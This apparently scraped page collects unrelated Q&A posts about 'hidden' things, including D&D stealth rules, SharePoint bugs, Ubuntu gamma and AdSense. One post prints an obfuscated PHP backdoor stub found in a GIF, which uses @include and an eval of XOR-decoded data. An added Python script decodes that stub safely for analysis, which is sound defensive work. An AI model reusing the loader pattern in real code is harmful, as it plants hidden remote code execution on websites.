Securely displaying hidden integers with MD5

A system I’m trying to disprove security of uses the following mechanism: a 19-digit integer is hashed via the MD5 algorithm and the salt of the integer is shown in plain sight to the user before they take an irreversible action relevant to trying to guess the first 2 digits of said number.

Somehow, this screams of insecurity to me. With 10^19 possible results for each particular implementation and a 2-minute lifetime of a single entry, as well as capabilities of modern GPUs, I just don’t feel giving the okay to rolling this out.

My attempts to tackle it with a hashcat mask bruteforce with a somewhat high-end graphics card off my personal computer give very reassuring results of a time way exceeding two minutes, yet intuition seems to hint at something I’m missing.

Am I?

When attacking while hidden what does ‘give away location’ mean?


If you are hidden–both unseen and unheard–when you make an attack, you give away your location when the attack hits or misses.

Does this mean enemies attacking the hidden creature no longer have disadvantage as described in the proceeding paragraph?

When you attack a target that you can’t see, you have disadvantage on the attack roll. This is true whether you’re guessing the target’s location or you’re targeting a creature you can hear but not see. If the target isn’t in the location you targeted, you automatically miss, but the GM typically just says that the attack missed, not whether you guessed the target’s location correctly.

If the attacker then breaks line of sight and becomes unattackable, then next turn becomes partially visible do they once again for enemies to be at disadvantage or is the bonus still negated?

Can you move while Hidden?

Assuming you have successfully Hidden, can you:

  1. Continue to be not ‘clearly visible’ while moving and remain Hidden.
  2. Become ‘clearly visible’ while moving and remain Hidden.

In the Stealth section it says:

Make a Dexterity (Stealth) check when you attempt to conceal yourself from enemies, slink past guards, slip away without being noticed, or sneak up on someone without being seen or heard.

So you can definitely move unseen with a Stealth action, but is that allowed in the Hide action?

Hiding:

Until you are discovered or you stop hiding, that check’s total is contested by the Wisdom (Perception) check of any creature that actively searches for signs of your presence.

You can’t hide from a creature that can see you clearly, and you give away your position if you make noise, such as shouting a warning or knocking over a vase.

Passive Perception. When you hide, there’s a chance someone will notice you even if they aren’t searching. To determine whether such a creature notices you, the DM compares your Dexterity (Stealth) check with that creature’s passive Wisdom (Perception) score

The rules clearly state that in order to hide you only need to be ‘not clearly seen’ and it is successful if you beat the opponent’s Passive Perception. Your position is given away if you make noise (although you are not revealed). If an opponent takes the Search action to make a Perception check and beats your Stealth roll then you are discovered.

So the Hide action is a Stealth roll contested by Passive Perception. Creatures can contest the roll with the Search action using their Perception. Unless a creature opts to no longer be hidden, these are the only ways they can be revealed?

This seems to indicate that moving has no bearing on remaining hidden.

Does a creature know that it is hidden?

When a creature attempts to Hide it makes a Stealth check, which is compared to the passive Perception of opposing creatures that may notice it, or a group check if there is more than one.

Does the creature attempting to Hide know whether or not it has successfully hidden?

If an opposing creature decides to take the Search action, making a Perception check to attempt to detect the hiding creature, does the hiding creature know if they have remained hidden? Does the hiding creature know that the Search action has been taken?

News webpart layout breaks on resize while hidden

I have written a wrapper for native Sharepoint online News webparts which combines them into a tabbed layout. A result of this is that a number of the webparts are hidden most of the time. If the window is made smaller, the webparts rescale to fit the new dimensions but if the window is made larger again the hidden ones don’t rescale again.

Below is an image of the news webpart, properly scaled

And below is a picture of the problem occurring after a resize.

My initial thought was to fix this using css, but it doesn’t render all the content when it shows the compact layout.

Is there a way to force the webpart to resize? It doesn’t appear to respond to resizing of its parents and resizing the window is not allowed in most browsers.

Ubuntu has extra hidden gamma curve? (weird stuff…)

As soon as I loaded my test image I noticed the gradient was no longer smooth but it contained some vertical artifacts. I should point out that the gamma is set to default in Ubuntu: xgamma gamma 1.0

I also have Windblows 10 and OSX and there the gradient is smooth. However in Ubuntu it is brighter and contains vertical artifacts. And each time I take a screenshot, the test image becomes brighter. This is driving me crazy.

So here is a test image: https://i.imgur.com/TflxhEi.png

When I open it on Win and OSX it is smooth and contains proper black. Here is a screenshot from Win10: https://i.imgur.com/uInvTgS.png

Here is a screenshot from Ubuntu (notice vertical artifact, less blacks, make sure to zoom in): https://i.imgur.com/9ZVoxnN.png

Here is a screenshot of a screenshot: https://i.imgur.com/avmdSmK.png

Here is a screenshot of a screenshot of a screenshot: https://i.imgur.com/kC8EF8a.png

The test image in the last example has become stupidly bright indicating there is another layer of gamma control present in the display settings that is just hidden from access.

Please keep in mind before you mention I should change gamma, this is all happening at gamma 1.0.

SharePoint 2013 Quick Edit while filtering hidden column shows error

I’ve got a problem using quick edit while filtering by a hidden column.

How to reproduce this error step by step:

  1. For example in Documents add new column (I called it TestCol, simple text)
  2. Add new element/document in list. Set value e.g. 1
  3. Using AllItems.aspx?FilterField1=TestCol&FilterValue1=1 will sort all items in list by this column. Quick edit here works fine.
  4. Hide this column (uncheck TestCol in Modify View).
  5. Now in view use Quick Edit.
  6. After changing name press Stop
  7. Error shows up, page doesn’t redirect
  8. After clicking on that list (for me Documents) changes are shown.

I check in Fiddler and it shows status 601. Request looks like this

POST /TeamSite1/_layouts/15/inplview.aspx?List={574CD88A-97AE-4315-BBA8-2802AB1AC0B3}&View={0136CAE6-365B-4F6D-BF49-6DC1F6C8250B}&ViewCount=0&IsXslView=TRUE&IsCSR=TRUE&FilterField1=TestCol&FilterValue1=1&FilterField2=undefined&FilterValue2=1 HTTP/1.1

As you can see it adds at the end

&FilterField2=undefined&FilterValue2=1

In logs I found this:

System.ArgumentException: Column ‘undefined’ does not exist. It may have been deleted by another user.

Any idea how to resolve this problem?

How can I tell if the hidden PHP code inside of a GIF file is dangerous?

I’m helping out a friend with a PHP website he has been running for a few years. He is not PHP developer, so he asked if I could help him out.

I download the contents of the server files onto my laptop and found a strange hex code embedded in the top of the page

<?php @include("4630773715a7537so24-20.7i6");?> 

This didn’t look like any PHP code I’d ever seen before so I decoded it and it basically said ‘tvshows/images/sort-2x.gif’. And so I thought, “hmmm, that’s really weird”.

So when I go to the file, it is just PHP code. But here is the weird part. A huge file filled with URL Encoded Characters.

<?php $_c62un = basename(trim(preg_replace(rawurldecode("%2F%5C%28.%2A%24%2F"), '', __FILE__)));$_cx4pt = "[long URL-encoded payload omitted]";eval(rawurldecode($_cx4pt) ^ substr(str_repeat($_c62un, (strlen($_cx4pt)/strlen($_c62un)) + 1), 0, strlen($_cx4pt)));

There’s more than just this, but the rest appears to be commented out. But it is thousands of characters long.

Now I tried to decode it, but it didn’t seem to make any sense to me. I uploaded the whole file to some site which said it could decode the thing, but it just returned a random .bin file.

My gut is telling me this is probably malware or possibly a virus. Any way I can verify what this is or how I can decode the entire .gif file? Should I delete ASAP? Or is it harmless?

I know very little about security except to say this looks very suspicious to me.
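
Added example, not part of the original post: the stub above URL-decodes its string and XORs it with the file's own name repeated to length, so the payload can be recovered statically, without ever letting PHP `eval` it. The directory prefix, the sample plaintext and the helper names below are constructed for illustration; only the file name `sort-2x.gif` and the regex come from the post.

```python
import re
from urllib.parse import quote_from_bytes, unquote_to_bytes

# The stub's rawurldecode("%2F%5C%28.%2A%24%2F") is the regex /\(.*$/ . Inside
# eval()'d code PHP reports __FILE__ as "<path>(N) : eval()'d code", so the
# stub strips that suffix and keeps the bare file name as its XOR key.
EVAL_SUFFIX = re.compile(r"\(.*$")

def key_from_path(path):
    # Mirrors basename(trim(preg_replace(..., '', __FILE__))).
    stripped = EVAL_SUFFIX.sub("", path).strip()
    return stripped.replace("\\", "/").rsplit("/", 1)[-1].encode("latin-1")

def xor_repeat(data, key):
    if not key:
        raise ValueError("the original file name is needed as the key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decode_payload(encoded, path):
    # rawurldecode() then XOR with the repeated file name; nothing is executed.
    return xor_repeat(unquote_to_bytes(encoded), key_from_path(path))

def triage(decoded):
    # Names worth a closer look in decoded PHP: a hint for the analyst, not a verdict.
    names = [b"eval", b"assert", b"base64_decode", b"system", b"shell_exec",
             b"$_POST", b"$_REQUEST", b"$_COOKIE"]
    return [n.decode() for n in names if n in decoded]

# Constructed sample: a harmless snippet encoded the way the stub expects.
# The directory prefix is hypothetical; the file name is the one in the post.
SAMPLE_PATH = "/var/www/tvshows/images/sort-2x.gif"
SAMPLE_PLAIN = b'if (isset($_POST["k"])) { echo "constructed sample"; }'
SAMPLE_ENCODED = quote_from_bytes(xor_repeat(SAMPLE_PLAIN, key_from_path(SAMPLE_PATH)))

if __name__ == "__main__":
    print(decode_payload(SAMPLE_ENCODED, SAMPLE_PATH).decode())
    print("flagged:", triage(decode_payload(SAMPLE_ENCODED, SAMPLE_PATH)))
    # A copy saved under another name yields the wrong key and garbage output.
    print(decode_payload(SAMPLE_ENCODED, "/tmp/renamed.bin"))
```

Because the key is the file name as it sits on the server, a copy renamed during download or upload to an online decoder will not decode; pass the original name together with the quoted string taken from the file.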

Do Area of Effect spells reveal hidden or invisible enemies?

As a question that came up from this discussion about whether Mind Blank foils all attempts to gain information about the target, can area of effect spells be used to reveal enemies?

In the example of a fireball spell. Fireball does not have to target an enemy directly; the caster can specify a specific location, and the fireball affects the entire area within the spell’s radius.

But would that fireball reveal to the caster any hidden or invisible enemies or things in that area?

Using Google Adsense on Hidden Sections of Domain

I got a verified google adsense account a few years ago when I was running my own little blog which related to my web design business. I was then able to use the same registered account to set up ads on a music website that I created under a new dedicated domain.

Now, I’d like to use adsense on my new website, but it’s a little complicated as the pages are kind of hidden behind a wall.

Let me explain.

My domain is a business, and has no need for adsense on any of the main pages, but I’ve created a back end section (---.com/extra/), where pages that contain adsense banners will be placed.

There is no index page on /extra as the sites on there are all very differently themed and I generally don’t want to go to the hassle of creating a main index page – Most visitors will come via searches and social media.

Any ideas on how I can make sure Google don’t flag my adverts for technically “hiding” my pages in this way?

Alternatively, are there any other ways to monetise a site like this without the use of banners? I like the idea of banner placement, but I’m all for trying other methods if they are more suited to the setup of my website.